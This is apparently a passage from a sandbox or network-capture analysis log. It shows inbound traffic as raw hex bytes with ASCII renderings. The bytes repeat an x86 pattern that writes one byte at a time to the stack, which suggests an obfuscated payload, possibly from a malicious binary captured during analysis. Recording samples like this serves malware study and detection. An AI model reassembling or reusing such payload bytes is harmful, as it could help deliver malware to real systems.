2022-05-16 08:29:53 UTC	5437	IN	Data Raw: c6 85 68 13 ff ff 42 c6 85 69 13 ff ff 50 c6 85 6a 13 ff ff bd c6 85 6b 13 ff ff e3 c6 85 6c 13 ff ff 83 c6 85 6d 13 ff ff aa c6 85 6e 13 ff ff aa c6 85 6f 13 ff ff 8c c6 85 70 13 ff ff 37 c6 85 71 13 ff ff c8 c6 85 72 13 ff ff 09 c6 85 73 13 ff ff 45 c6 85 74 13 ff ff 56 c6 85 75 13 ff ff 97 c6 85 76 13 ff ff a2 c6 85 77 13 ff ff 6f c6 85 78 13 ff ff 19 c6 85 79 13 ff ff ae c6 85 7a 13 ff ff 09 c6 85 7b 13 ff ff 55 c6 85 7c 13 ff ff 5b c6 85 7d 13 ff ff 62 c6 85 7e 13 ff ff 58 c6 85 7f 13 ff ff 18 c6 85 80 13 ff ff d3 c6 85 81 13 ff ff ee c6 85 82 13 ff ff e9 c6 85 83 13 ff ff 22 c6 85 84 13 ff ff 9f c6 85 85 13 ff ff ef c6 85 86 13 ff ff 70 c6 85 87 13 ff ff bf c6 85 88 13 ff ff e5 c6 85 89 13 ff ff 04 c6 85 8a 13 ff ff 77 c6 85 8b 13 ff ff 7c c6 85 8c Data Ascii: hBiPjklmnop7qrsEtVuvwoxyz{U\|[}b~X"pw\|
2022-05-16 08:29:53 UTC	5453	IN	Data Raw: ff ff 0d c6 85 8d 1c ff ff 8d c6 85 8e 1c ff ff 2b c6 85 8f 1c ff ff b9 c6 85 90 1c ff ff 39 c6 85 91 1c ff ff 34 c6 85 92 1c ff ff 71 c6 85 93 1c ff ff 03 c6 85 94 1c ff ff 85 c6 85 95 1c ff ff 85 c6 85 96 1c ff ff ca c6 85 97 1c ff ff e3 c6 85 98 1c ff ff 98 c6 85 99 1c ff ff aa c6 85 9a 1c ff ff 68 c6 85 9b 1c ff ff f5 c6 85 9c 1c ff ff ae c6 85 9d 1c ff ff 71 c6 85 9e 1c ff ff 03 c6 85 9f 1c ff ff ab c6 85 a0 1c ff ff 92 c6 85 a1 1c ff ff 6f c6 85 a2 1c ff ff 54 c6 85 a3 1c ff ff ce c6 85 a4 1c ff ff 5c c6 85 a5 1c ff ff 1b c6 85 a6 1c ff ff 68 c6 85 a7 1c ff ff 5a c6 85 a8 1c ff ff 6c c6 85 a9 1c ff ff 52 c6 85 aa 1c ff ff f2 c6 85 ab 1c ff ff c1 c6 85 ac 1c ff ff e2 c6 85 ad 1c ff ff 27 c6 85 ae 1c ff ff a7 c6 85 af 1c ff ff d0 c6 85 b0 1c ff ff 7d Data Ascii: +94qhqoT\hZlR'}
2022-05-16 08:29:53 UTC	5469	IN	Data Raw: 85 b1 25 ff ff 2f c6 85 b2 25 ff ff 68 c6 85 b3 25 ff ff 10 c6 85 b4 25 ff ff c3 c6 85 b5 25 ff ff c5 c6 85 b6 25 ff ff 68 c6 85 b7 25 ff ff df c6 85 b8 25 ff ff 70 c6 85 b9 25 ff ff f0 c6 85 ba 25 ff ff 1e c6 85 bb 25 ff ff 6f c6 85 bc 25 ff ff a5 c6 85 bd 25 ff ff 24 c6 85 be 25 ff ff b2 c6 85 bf 25 ff ff 8d c6 85 c0 25 ff ff 97 c6 85 c1 25 ff ff d8 c6 85 c2 25 ff ff ca c6 85 c3 25 ff ff f8 c6 85 c4 25 ff ff 3f c6 85 c5 25 ff ff d2 c6 85 c6 25 ff ff 6f c6 85 c7 25 ff ff 7e c6 85 c8 25 ff ff 24 c6 85 c9 25 ff ff 8d c6 85 ca 25 ff ff c9 c6 85 cb 25 ff ff 67 c6 85 cc 25 ff ff 05 c6 85 cd 25 ff ff 9c c6 85 ce 25 ff ff 3c c6 85 cf 25 ff ff 5b c6 85 d0 25 ff ff 4f c6 85 d1 25 ff ff 01 c6 85 d2 25 ff ff 63 c6 85 d3 25 ff ff 7d c6 85 d4 25 ff ff f1 c6 85 d5 25 Data Ascii: %/%h%%%%h%%p%%%o%%$%%%%%%%?%%o%~%$%%%g%%%<%[%O%%c%}%%
2022-05-16 08:29:53 UTC	5485	IN	Data Raw: ff a7 c6 85 d6 2e ff ff 95 c6 85 d7 2e ff ff be c6 85 d8 2e ff ff 63 c6 85 d9 2e ff ff 45 c6 85 da 2e ff ff de c6 85 db 2e ff ff a3 c6 85 dc 2e ff ff 02 c6 85 dd 2e ff ff 60 c6 85 de 2e ff ff 78 c6 85 df 2e ff ff 65 c6 85 e0 2e ff ff 70 c6 85 e1 2e ff ff 99 c6 85 e2 2e ff ff 91 c6 85 e3 2e ff ff bb c6 85 e4 2e ff ff f7 c6 85 e5 2e ff ff 10 c6 85 e6 2e ff ff c3 c6 85 e7 2e ff ff 11 c6 85 e8 2e ff ff fa c6 85 e9 2e ff ff df c6 85 ea 2e ff ff 22 c6 85 eb 2e ff ff 3c c6 85 ec 2e ff ff 0f c6 85 ed 2e ff ff 9b c6 85 ee 2e ff ff 9c c6 85 ef 2e ff ff 21 c6 85 f0 2e ff ff 00 c6 85 f1 2e ff ff d3 c6 85 f2 2e ff ff f4 c6 85 f3 2e ff ff f3 c6 85 f4 2e ff ff 4c c6 85 f5 2e ff ff a9 c6 85 f6 2e ff ff f0 c6 85 f7 2e ff ff 86 c6 85 f8 2e ff ff 02 c6 85 f9 2e ff ff 90 c6 Data Ascii: ...c.E....`.x.e.p..........".<....!.....L.....
2022-05-16 08:29:53 UTC	5501	IN	Data Raw: fa 37 ff ff aa c6 85 fb 37 ff ff a6 c6 85 fc 37 ff ff a0 c6 85 fd 37 ff ff 40 c6 85 fe 37 ff ff 86 c6 85 ff 37 ff ff bf c6 85 00 38 ff ff 48 c6 85 01 38 ff ff e1 c6 85 02 38 ff ff f1 c6 85 03 38 ff ff 45 c6 85 04 38 ff ff 45 c6 85 05 38 ff ff 5d c6 85 06 38 ff ff 1d c6 85 07 38 ff ff 51 c6 85 08 38 ff ff ab c6 85 09 38 ff ff ff c6 85 0a 38 ff ff 12 c6 85 0b 38 ff ff e9 c6 85 0c 38 ff ff 0d c6 85 0d 38 ff ff fe c6 85 0e 38 ff ff 36 c6 85 0f 38 ff ff 7d c6 85 10 38 ff ff 47 c6 85 11 38 ff ff 04 c6 85 12 38 ff ff 91 c6 85 13 38 ff ff 91 c6 85 14 38 ff ff a3 c6 85 15 38 ff ff f9 c6 85 16 38 ff ff be c6 85 17 38 ff ff bf c6 85 18 38 ff ff 0f c6 85 19 38 ff ff c8 c6 85 1a 38 ff ff 48 c6 85 1b 38 ff ff 12 c6 85 1c 38 ff ff 5b c6 85 1d 38 ff ff 9d c6 85 1e 38 ff Data Ascii: 7777@778H888E8E8]88Q888888868}8G8888888888H88[88
2022-05-16 08:29:53 UTC	5517	IN	Data Raw: 3a c6 85 1f 41 ff ff 01 c6 85 20 41 ff ff 3e c6 85 21 41 ff ff 6f c6 85 22 41 ff ff 01 c6 85 23 41 ff ff 44 c6 85 24 41 ff ff b7 c6 85 25 41 ff ff ee c6 85 26 41 ff ff fb c6 85 27 41 ff ff 2e c6 85 28 41 ff ff a8 c6 85 29 41 ff ff e5 c6 85 2a 41 ff ff 02 c6 85 2b 41 ff ff cb c6 85 2c 41 ff ff af c6 85 2d 41 ff ff 4d c6 85 2e 41 ff ff 06 c6 85 2f 41 ff ff 3b c6 85 30 41 ff ff 1c c6 85 31 41 ff ff 43 c6 85 32 41 ff ff cd c6 85 33 41 ff ff c3 c6 85 34 41 ff ff 5f c6 85 35 41 ff ff a2 c6 85 36 41 ff ff 54 c6 85 37 41 ff ff da c6 85 38 41 ff ff 04 c6 85 39 41 ff ff 52 c6 85 3a 41 ff ff 76 c6 85 3b 41 ff ff 50 c6 85 3c 41 ff ff e1 c6 85 3d 41 ff ff ba c6 85 3e 41 ff ff 91 c6 85 3f 41 ff ff ea c6 85 40 41 ff ff aa c6 85 41 41 ff ff cb c6 85 42 41 ff ff 7d c6 85 Data Ascii: :A A>!Ao"A#AD$A%A&A'A.(A)A*A+A,A-AM.A/A;0A1AC2A3A4A_5A6AT7A8A9AR:Av;AP<A=A>A?A@AAABA}
2022-05-16 08:29:53 UTC	5533	IN	Data Raw: 4a ff ff ac c6 85 44 4a ff ff b2 c6 85 45 4a ff ff 3a c6 85 46 4a ff ff 72 c6 85 47 4a ff ff 89 c6 85 48 4a ff ff 20 c6 85 49 4a ff ff 88 c6 85 4a 4a ff ff 39 c6 85 4b 4a ff ff 29 c6 85 4c 4a ff ff 3e c6 85 4d 4a ff ff 27 c6 85 4e 4a ff ff f5 c6 85 4f 4a ff ff b2 c6 85 50 4a ff ff c9 c6 85 51 4a ff ff 01 c6 85 52 4a ff ff e0 c6 85 53 4a ff ff df c6 85 54 4a ff ff c3 c6 85 55 4a ff ff 06 c6 85 56 4a ff ff 12 c6 85 57 4a ff ff c1 c6 85 58 4a ff ff 7e c6 85 59 4a ff ff 7d c6 85 5a 4a ff ff 41 c6 85 5b 4a ff ff 6b c6 85 5c 4a ff ff e3 c6 85 5d 4a ff ff df c6 85 5e 4a ff ff 7d c6 85 5f 4a ff ff 8b c6 85 60 4a ff ff 21 c6 85 61 4a ff ff 02 c6 85 62 4a ff ff 3a c6 85 63 4a ff ff 32 c6 85 64 4a ff ff 24 c6 85 65 4a ff ff 0d c6 85 66 4a ff ff c9 c6 85 67 4a ff ff Data Ascii: JDJEJ:FJrGJHJ IJJJ9KJ)LJ>MJ'NJOJPJQJRJSJTJUJVJWJXJ~YJ}ZJA[Jk\J]J^J}_J`J!aJbJ:cJ2dJ$eJfJgJ
2022-05-16 08:29:53 UTC	5549	IN	Data Raw: c6 85 68 53 ff ff 8a c6 85 69 53 ff ff ae c6 85 6a 53 ff ff 68 c6 85 6b 53 ff ff 0d c6 85 6c 53 ff ff 58 c6 85 6d 53 ff ff c7 c6 85 6e 53 ff ff ef c6 85 6f 53 ff ff 1c c6 85 70 53 ff ff 48 c6 85 71 53 ff ff ed c6 85 72 53 ff ff 3d c6 85 73 53 ff ff 09 c6 85 74 53 ff ff 7a c6 85 75 53 ff ff dc c6 85 76 53 ff ff 14 c6 85 77 53 ff ff 2f c6 85 78 53 ff ff d2 c6 85 79 53 ff ff 8e c6 85 7a 53 ff ff 9b c6 85 7b 53 ff ff 5a c6 85 7c 53 ff ff 8e c6 85 7d 53 ff ff 9c c6 85 7e 53 ff ff 0e c6 85 7f 53 ff ff 82 c6 85 80 53 ff ff ab c6 85 81 53 ff ff 34 c6 85 82 53 ff ff 04 c6 85 83 53 ff ff 01 c6 85 84 53 ff ff 7d c6 85 85 53 ff ff 39 c6 85 86 53 ff ff f8 c6 85 87 53 ff ff 9f c6 85 88 53 ff ff 2a c6 85 89 53 ff ff 0a c6 85 8a 53 ff ff 7a c6 85 8b 53 ff ff ac c6 85 8c Data Ascii: hSiSjShkSlSXmSnSoSpSHqSrS=sStSzuSvSwS/xSySzS{SZ\|S}S~SSSS4SSS}S9SSS*SSzS
2022-05-16 08:29:53 UTC	5565	IN	Data Raw: ff ff c1 c6 85 8d 5c ff ff 67 c6 85 8e 5c ff ff e8 c6 85 8f 5c ff ff ad c6 85 90 5c ff ff d5 c6 85 91 5c ff ff ae c6 85 92 5c ff ff 36 c6 85 93 5c ff ff 77 c6 85 94 5c ff ff 03 c6 85 95 5c ff ff fd c6 85 96 5c ff ff 42 c6 85 97 5c ff ff a6 c6 85 98 5c ff ff a6 c6 85 99 5c ff ff 35 c6 85 9a 5c ff ff 10 c6 85 9b 5c ff ff bc c6 85 9c 5c ff ff 04 c6 85 9d 5c ff ff 5d c6 85 9e 5c ff ff 54 c6 85 9f 5c ff ff 5f c6 85 a0 5c ff ff 5c c6 85 a1 5c ff ff 55 c6 85 a2 5c ff ff cf c6 85 a3 5c ff ff d4 c6 85 a4 5c ff ff d0 c6 85 a5 5c ff ff 13 c6 85 a6 5c ff ff c5 c6 85 a7 5c ff ff c5 c6 85 a8 5c ff ff 29 c6 85 a9 5c ff ff e4 c6 85 aa 5c ff ff a3 c6 85 ab 5c ff ff 36 c6 85 ac 5c ff ff 40 c6 85 ad 5c ff ff 33 c6 85 ae 5c ff ff 5f c6 85 af 5c ff ff 04 c6 85 b0 5c ff ff cb Data Ascii: \g\\\\\6\w\\\B\\\5\\\\]\T\_\\\U\\\\\\\)\\\6\@\3\_\\
2022-05-16 08:29:53 UTC	5581	IN	Data Raw: 85 b1 65 ff ff b8 c6 85 b2 65 ff ff 06 c6 85 b3 65 ff ff 3c c6 85 b4 65 ff ff 29 c6 85 b5 65 ff ff 05 c6 85 b6 65 ff ff 98 c6 85 b7 65 ff ff 85 c6 85 b8 65 ff ff 3a c6 85 b9 65 ff ff 47 c6 85 ba 65 ff ff 9c c6 85 bb 65 ff ff a3 c6 85 bc 65 ff ff 82 c6 85 bd 65 ff ff f4 c6 85 be 65 ff ff 3c c6 85 bf 65 ff ff 71 c6 85 c0 65 ff ff 2b c6 85 c1 65 ff ff 52 c6 85 c2 65 ff ff 65 c6 85 c3 65 ff ff 6c c6 85 c4 65 ff ff 54 c6 85 c5 65 ff ff 9b c6 85 c6 65 ff ff c2 c6 85 c7 65 ff ff 1f c6 85 c8 65 ff ff 68 c6 85 c9 65 ff ff 78 c6 85 ca 65 ff ff 62 c6 85 cb 65 ff ff ba c6 85 cc 65 ff ff eb c6 85 cd 65 ff ff c5 c6 85 ce 65 ff ff 9b c6 85 cf 65 ff ff 09 c6 85 d0 65 ff ff a7 c6 85 d1 65 ff ff ca c6 85 d2 65 ff ff 79 c6 85 d3 65 ff ff ac c6 85 d4 65 ff ff b0 c6 85 d5 65 Data Ascii: eee<e)eeee:eGeeeee<eqe+eReeeleTeeeehexebeeeeeeeeyeee
2022-05-16 08:29:53 UTC	5597	IN	Data Raw: ff 33 c6 85 d6 6e ff ff fc c6 85 d7 6e ff ff c5 c6 85 d8 6e ff ff 79 c6 85 d9 6e ff ff de c6 85 da 6e ff ff 33 c6 85 db 6e ff ff f9 c6 85 dc 6e ff ff 46 c6 85 dd 6e ff ff 69 c6 85 de 6e ff ff 7a c6 85 df 6e ff ff 24 c6 85 e0 6e ff ff aa c6 85 e1 6e ff ff 23 c6 85 e2 6e ff ff c1 c6 85 e3 6e ff ff df c6 85 e4 6e ff ff c8 c6 85 e5 6e ff ff fa c6 85 e6 6e ff ff 28 c6 85 e7 6e ff ff d2 c6 85 e8 6e ff ff 47 c6 85 e9 6e ff ff 5f c6 85 ea 6e ff ff 8a c6 85 eb 6e ff ff 81 c6 85 ec 6e ff ff c9 c6 85 ed 6e ff ff 56 c6 85 ee 6e ff ff c6 c6 85 ef 6e ff ff 98 c6 85 f0 6e ff ff 3c c6 85 f1 6e ff ff 5d c6 85 f2 6e ff ff 41 c6 85 f3 6e ff ff 29 c6 85 f4 6e ff ff 7f c6 85 f5 6e ff ff 79 c6 85 f6 6e ff ff dc c6 85 f7 6e ff ff ff c6 85 f8 6e ff ff 04 c6 85 f9 6e ff ff 2f c6 Data Ascii: 3nnnynn3nnFninzn$nn#nnnnn(nnGn_nnnnVnnn<n]nAn)nnynnnn/
2022-05-16 08:29:53 UTC	5613	IN	Data Raw: fa 77 ff ff 94 c6 85 fb 77 ff ff 39 c6 85 fc 77 ff ff 0d c6 85 fd 77 ff ff 2f c6 85 fe 77 ff ff 67 c6 85 ff 77 ff ff 2c c6 85 00 78 ff ff 0c c6 85 01 78 ff ff 24 c6 85 02 78 ff ff 2c c6 85 03 78 ff ff f8 c6 85 04 78 ff ff 23 c6 85 05 78 ff ff f6 c6 85 06 78 ff ff 39 c6 85 07 78 ff ff 41 c6 85 08 78 ff ff c4 c6 85 09 78 ff ff 91 c6 85 0a 78 ff ff 8a c6 85 0b 78 ff ff df c6 85 0c 78 ff ff 9e c6 85 0d 78 ff ff 9f c6 85 0e 78 ff ff ed c6 85 0f 78 ff ff ab c6 85 10 78 ff ff f7 c6 85 11 78 ff ff 4f c6 85 12 78 ff ff 45 c6 85 13 78 ff ff 76 c6 85 14 78 ff ff 2b c6 85 15 78 ff ff b9 c6 85 16 78 ff ff 9b c6 85 17 78 ff ff 3c c6 85 18 78 ff ff f6 c6 85 19 78 ff ff 01 c6 85 1a 78 ff ff 6b c6 85 1b 78 ff ff 54 c6 85 1c 78 ff ff 68 c6 85 1d 78 ff ff 27 c6 85 1e 78 ff Data Ascii: ww9ww/wgw,xx$x,xx#xx9xAxxxxxxxxxxOxExvx+xxx<xxxkxTxhx'x
2022-05-16 08:29:53 UTC	5629	IN	Data Raw: a6 c6 85 1f 81 ff ff 48 c6 85 20 81 ff ff 9c c6 85 21 81 ff ff e1 c6 85 22 81 ff ff 04 c6 85 23 81 ff ff e0 c6 85 24 81 ff ff fc c6 85 25 81 ff ff 73 c6 85 26 81 ff ff 49 c6 85 27 81 ff ff 1e c6 85 28 81 ff ff 59 c6 85 29 81 ff ff 1c c6 85 2a 81 ff ff ff c6 85 2b 81 ff ff a4 c6 85 2c 81 ff ff 48 c6 85 2d 81 ff ff b1 c6 85 2e 81 ff ff 4b c6 85 2f 81 ff ff 97 c6 85 30 81 ff ff 5a c6 85 31 81 ff ff 09 c6 85 32 81 ff ff 41 c6 85 33 81 ff ff 02 c6 85 34 81 ff ff ce c6 85 35 81 ff ff f8 c6 85 36 81 ff ff 5a c6 85 37 81 ff ff 95 c6 85 38 81 ff ff 99 c6 85 39 81 ff ff e0 c6 85 3a 81 ff ff 5b c6 85 3b 81 ff ff af c6 85 3c 81 ff ff 13 c6 85 3d 81 ff ff 4c c6 85 3e 81 ff ff 11 c6 85 3f 81 ff ff 97 c6 85 40 81 ff ff d8 c6 85 41 81 ff ff 03 c6 85 42 81 ff ff 42 c6 85 Data Ascii: H !"#$%s&I'(Y)*+,H-.K/0Z12A3456Z789:[;<=L>?@ABB
2022-05-16 08:29:53 UTC	5645	IN	Data Raw: 8a ff ff 0e c6 85 44 8a ff ff fd c6 85 45 8a ff ff bb c6 85 46 8a ff ff d6 c6 85 47 8a ff ff 9c c6 85 48 8a ff ff 81 c6 85 49 8a ff ff 3e c6 85 4a 8a ff ff dc c6 85 4b 8a ff ff 8d c6 85 4c 8a ff ff 43 c6 85 4d 8a ff ff 88 c6 85 4e 8a ff ff ca c6 85 4f 8a ff ff 6d c6 85 50 8a ff ff a5 c6 85 51 8a ff ff cc c6 85 52 8a ff ff 6b c6 85 53 8a ff ff 63 c6 85 54 8a ff ff 9c c6 85 55 8a ff ff d2 c6 85 56 8a ff ff 2f c6 85 57 8a ff ff d0 c6 85 58 8a ff ff b9 c6 85 59 8a ff ff 9e c6 85 5a 8a ff ff 6d c6 85 5b 8a ff ff 3d c6 85 5c 8a ff ff b3 c6 85 5d 8a ff ff 8a c6 85 5e 8a ff ff c5 c6 85 5f 8a ff ff df c6 85 60 8a ff ff 73 c6 85 61 8a ff ff aa c6 85 62 8a ff ff c5 c6 85 63 8a ff ff b9 c6 85 64 8a ff ff ad c6 85 65 8a ff ff 93 c6 85 66 8a ff ff 3d c6 85 67 8a ff ff Data Ascii: DEFGHI>JKLCMNOmPQRkScTUV/WXYZm[=\]^_`sabcdef=g
2022-05-16 08:29:53 UTC	5661	IN	Data Raw: c6 85 68 93 ff ff f2 c6 85 69 93 ff ff 1a c6 85 6a 93 ff ff 6c c6 85 6b 93 ff ff 5a c6 85 6c 93 ff ff dd c6 85 6d 93 ff ff 9b c6 85 6e 93 ff ff 3e c6 85 6f 93 ff ff 27 c6 85 70 93 ff ff 0a c6 85 71 93 ff ff 00 c6 85 72 93 ff ff c9 c6 85 73 93 ff ff 01 c6 85 74 93 ff ff 60 c6 85 75 93 ff ff 4c c6 85 76 93 ff ff 38 c6 85 77 93 ff ff f9 c6 85 78 93 ff ff ed c6 85 79 93 ff ff 8d c6 85 7a 93 ff ff 7e c6 85 7b 93 ff ff 7d c6 85 7c 93 ff ff 7d c6 85 7d 93 ff ff d8 c6 85 7e 93 ff ff a3 c6 85 7f 93 ff ff df c6 85 80 93 ff ff b1 c6 85 81 93 ff ff 1f c6 85 82 93 ff ff 75 c6 85 83 93 ff ff 8b c6 85 84 93 ff ff 7e c6 85 85 93 ff ff 81 c6 85 86 93 ff ff 24 c6 85 87 93 ff ff 0d c6 85 88 93 ff ff 18 c6 85 89 93 ff ff 63 c6 85 8a 93 ff ff df c6 85 8b 93 ff ff ca c6 85 8c Data Ascii: hijlkZlmn>o'pqrst`uLv8wxyz~{}\|}}~u~$c
2022-05-16 08:29:53 UTC	5677	IN	Data Raw: ff ff 00 c6 85 8d 9c ff ff 9e c6 85 8e 9c ff ff 72 c6 85 8f 9c ff ff a3 c6 85 90 9c ff ff 4e c6 85 91 9c ff ff 0d c6 85 92 9c ff ff 28 c6 85 93 9c ff ff c9 c6 85 94 9c ff ff 97 c6 85 95 9c ff ff 6c c6 85 96 9c ff ff 33 c6 85 97 9c ff ff 0e c6 85 98 9c ff ff 78 c6 85 99 9c ff ff bc c6 85 9a 9c ff ff fe c6 85 9b 9c ff ff 8e c6 85 9c 9c ff ff 7b c6 85 9d 9c ff ff 3f c6 85 9e 9c ff ff a1 c6 85 9f 9c ff ff f8 c6 85 a0 9c ff ff 97 c6 85 a1 9c ff ff 93 c6 85 a2 9c ff ff cb c6 85 a3 9c ff ff 10 c6 85 a4 9c ff ff 1e c6 85 a5 9c ff ff e1 c6 85 a6 9c ff ff 79 c6 85 a7 9c ff ff 39 c6 85 a8 9c ff ff f8 c6 85 a9 9c ff ff f9 c6 85 aa 9c ff ff 5b c6 85 ab 9c ff ff d8 c6 85 ac 9c ff ff 66 c6 85 ad 9c ff ff ca c6 85 ae 9c ff ff 11 c6 85 af 9c ff ff 3a c6 85 b0 9c ff ff 43 Data Ascii: rN(l3x{?y9[f:C
2022-05-16 08:29:53 UTC	5693	IN	Data Raw: 85 b1 a5 ff ff 59 c6 85 b2 a5 ff ff 94 c6 85 b3 a5 ff ff ac c6 85 b4 a5 ff ff 34 c6 85 b5 a5 ff ff 18 c6 85 b6 a5 ff ff 66 c6 85 b7 a5 ff ff 31 c6 85 b8 a5 ff ff e1 c6 85 b9 a5 ff ff 38 c6 85 ba a5 ff ff cf c6 85 bb a5 ff ff 4f c6 85 bc a5 ff ff 86 c6 85 bd a5 ff ff 5e c6 85 be a5 ff ff 6c c6 85 bf a5 ff ff 27 c6 85 c0 a5 ff ff ea c6 85 c1 a5 ff ff c1 c6 85 c2 a5 ff ff 2d c6 85 c3 a5 ff ff 7d c6 85 c4 a5 ff ff 7a c6 85 c5 a5 ff ff 0c c6 85 c6 a5 ff ff bd c6 85 c7 a5 ff ff 09 c6 85 c8 a5 ff ff b7 c6 85 c9 a5 ff ff 46 c6 85 ca a5 ff ff 45 c6 85 cb a5 ff ff fe c6 85 cc a5 ff ff 25 c6 85 cd a5 ff ff ee c6 85 ce a5 ff ff 25 c6 85 cf a5 ff ff 29 c6 85 d0 a5 ff ff 01 c6 85 d1 a5 ff ff d8 c6 85 d2 a5 ff ff aa c6 85 d3 a5 ff ff 90 c6 85 d4 a5 ff ff 1d c6 85 d5 a5 Data Ascii: Y4f18O^l'-}zFE%%)
2022-05-16 08:29:53 UTC	5709	IN	Data Raw: ff a8 c6 85 d6 ae ff ff 75 c6 85 d7 ae ff ff 03 c6 85 d8 ae ff ff dc c6 85 d9 ae ff ff 92 c6 85 da ae ff ff c9 c6 85 db ae ff ff e3 c6 85 dc ae ff ff e0 c6 85 dd ae ff ff b4 c6 85 de ae ff ff 6b c6 85 df ae ff ff f5 c6 85 e0 ae ff ff f0 c6 85 e1 ae ff ff e5 c6 85 e2 ae ff ff 07 c6 85 e3 ae ff ff ab c6 85 e4 ae ff ff 41 c6 85 e5 ae ff ff 7f c6 85 e6 ae ff ff 57 c6 85 e7 ae ff ff ce c6 85 e8 ae ff ff 4a c6 85 e9 ae ff ff 03 c6 85 ea ae ff ff 6b c6 85 eb ae ff ff 5a c6 85 ec ae ff ff 9c c6 85 ed ae ff ff c1 c6 85 ee ae ff ff f6 c6 85 ef ae ff ff c1 c6 85 f0 ae ff ff ab c6 85 f1 ae ff ff 3f c6 85 f2 ae ff ff a4 c6 85 f3 ae ff ff d0 c6 85 f4 ae ff ff a3 c6 85 f5 ae ff ff b4 c6 85 f6 ae ff ff 9d c6 85 f7 ae ff ff 6c c6 85 f8 ae ff ff f3 c6 85 f9 ae ff ff e1 c6 Data Ascii: ukAWJkZ?l
2022-05-16 08:29:53 UTC	5725	IN	Data Raw: fa b7 ff ff 6c c6 85 fb b7 ff ff df c6 85 fc b7 ff ff 30 c6 85 fd b7 ff ff ed c6 85 fe b7 ff ff 1a c6 85 ff b7 ff ff 6f c6 85 00 b8 ff ff 26 c6 85 01 b8 ff ff 30 c6 85 02 b8 ff ff b6 c6 85 03 b8 ff ff 8d c6 85 04 b8 ff ff 29 c6 85 05 b8 ff ff 4c c6 85 06 b8 ff ff ce c6 85 07 b8 ff ff f8 c6 85 08 b8 ff ff 48 c6 85 09 b8 ff ff c6 c6 85 0a b8 ff ff 6b c6 85 0b b8 ff ff 7e c6 85 0c b8 ff ff 5c c6 85 0d b8 ff ff 91 c6 85 0e b8 ff ff cd c6 85 0f b8 ff ff 67 c6 85 10 b8 ff ff 84 c6 85 11 b8 ff ff 0f c6 85 12 b8 ff ff 38 c6 85 13 b8 ff ff 5b c6 85 14 b8 ff ff cf c6 85 15 b8 ff ff 1d c6 85 16 b8 ff ff 67 c6 85 17 b8 ff ff 7d c6 85 18 b8 ff ff 44 c6 85 19 b8 ff ff dd c6 85 1a b8 ff ff 90 c6 85 1b b8 ff ff 1b c6 85 1c b8 ff ff 19 c6 85 1d b8 ff ff 18 c6 85 1e b8 ff Data Ascii: l0o&0)LHk~\g8[g}D
2022-05-16 08:29:53 UTC	5741	IN	Data Raw: 09 c6 85 1f c1 ff ff 2f c6 85 20 c1 ff ff 87 c6 85 21 c1 ff ff 1e c6 85 22 c1 ff ff a8 c6 85 23 c1 ff ff 9e c6 85 24 c1 ff ff d3 c6 85 25 c1 ff ff ca c6 85 26 c1 ff ff 27 c6 85 27 c1 ff ff f6 c6 85 28 c1 ff ff d5 c6 85 29 c1 ff ff d2 c6 85 2a c1 ff ff 72 c6 85 2b c1 ff ff 2b c6 85 2c c1 ff ff 8e c6 85 2d c1 ff ff ec c6 85 2e c1 ff ff 9a c6 85 2f c1 ff ff 9f c6 85 30 c1 ff ff f6 c6 85 31 c1 ff ff 98 c6 85 32 c1 ff ff 23 c6 85 33 c1 ff ff f5 c6 85 34 c1 ff ff ad c6 85 35 c1 ff ff e5 c6 85 36 c1 ff ff 2f c6 85 37 c1 ff ff b9 c6 85 38 c1 ff ff bb c6 85 39 c1 ff ff 0f c6 85 3a c1 ff ff 2c c6 85 3b c1 ff ff bb c6 85 3c c1 ff ff 54 c6 85 3d c1 ff ff 67 c6 85 3e c1 ff ff 6c c6 85 3f c1 ff ff 27 c6 85 40 c1 ff ff 87 c6 85 41 c1 ff ff e1 c6 85 42 c1 ff ff e4 c6 85 Data Ascii: / !"#$%&''()*r++,-./012#3456/789:,;<T=g>l?'@AB
2022-05-16 08:29:53 UTC	5757	IN	Data Raw: ca ff ff 43 c6 85 44 ca ff ff f4 c6 85 45 ca ff ff 30 c6 85 46 ca ff ff 56 c6 85 47 ca ff ff a5 c6 85 48 ca ff ff b8 c6 85 49 ca ff ff e1 c6 85 4a ca ff ff f4 c6 85 4b ca ff ff a5 c6 85 4c ca ff ff 30 c6 85 4d ca ff ff 56 c6 85 4e ca ff ff e1 c6 85 4f ca ff ff 43 c6 85 50 ca ff ff b8 c6 85 51 ca ff ff 30 c6 85 52 ca ff ff a5 c6 85 53 ca ff ff f4 c6 85 54 ca ff ff b8 c6 85 55 ca ff ff b8 c6 85 56 ca ff ff 07 c6 85 57 ca ff ff 43 c6 85 58 ca ff ff 56 c6 85 59 ca ff ff 56 c6 85 5a ca ff ff 56 c6 85 5b ca ff ff 30 c6 85 5c ca ff ff e1 c6 85 5d ca ff ff 69 c6 85 5e ca ff ff f4 c6 85 5f ca ff ff b8 c6 85 60 ca ff ff b8 c6 85 61 ca ff ff 30 c6 85 62 ca ff ff 07 c6 85 63 ca ff ff f4 c6 85 64 ca ff ff e1 c6 85 65 ca ff ff 00 c6 85 66 ca ff ff f4 c6 85 67 ca ff ff Data Ascii: CDE0FVGHIJKL0MVNOCPQ0RSTUVWCXVYVZV[0\]i^_`a0bcdefg
2022-05-16 08:29:53 UTC	5773	IN	Data Raw: c6 85 68 d3 ff ff c5 c6 85 69 d3 ff ff 32 c6 85 6a d3 ff ff b1 c6 85 6b d3 ff ff a7 c6 85 6c d3 ff ff 1c c6 85 6d d3 ff ff 74 c6 85 6e d3 ff ff 8b c6 85 6f d3 ff ff 07 c6 85 70 d3 ff ff fe c6 85 71 d3 ff ff 9c c6 85 72 d3 ff ff 0a c6 85 73 d3 ff ff d8 c6 85 74 d3 ff ff 32 c6 85 75 d3 ff ff 9c c6 85 76 d3 ff ff e0 c6 85 77 d3 ff ff 6f c6 85 78 d3 ff ff 05 c6 85 79 d3 ff ff 7a c6 85 7a d3 ff ff 56 c6 85 7b d3 ff ff 09 c6 85 7c d3 ff ff aa c6 85 7d d3 ff ff cf c6 85 7e d3 ff ff 9b c6 85 7f d3 ff ff 83 c6 85 80 d3 ff ff 2a c6 85 81 d3 ff ff 78 c6 85 82 d3 ff ff 3d c6 85 83 d3 ff ff 6d c6 85 84 d3 ff ff 23 c6 85 85 d3 ff ff 0b c6 85 86 d3 ff ff 68 c6 85 87 d3 ff ff 52 c6 85 88 d3 ff ff 67 c6 85 89 d3 ff ff 83 c6 85 8a d3 ff ff 1f c6 85 8b d3 ff ff 0b c6 85 8c Data Ascii: hi2jklmtnopqrst2uvwoxyzzV{\|}~*x=m#hRg
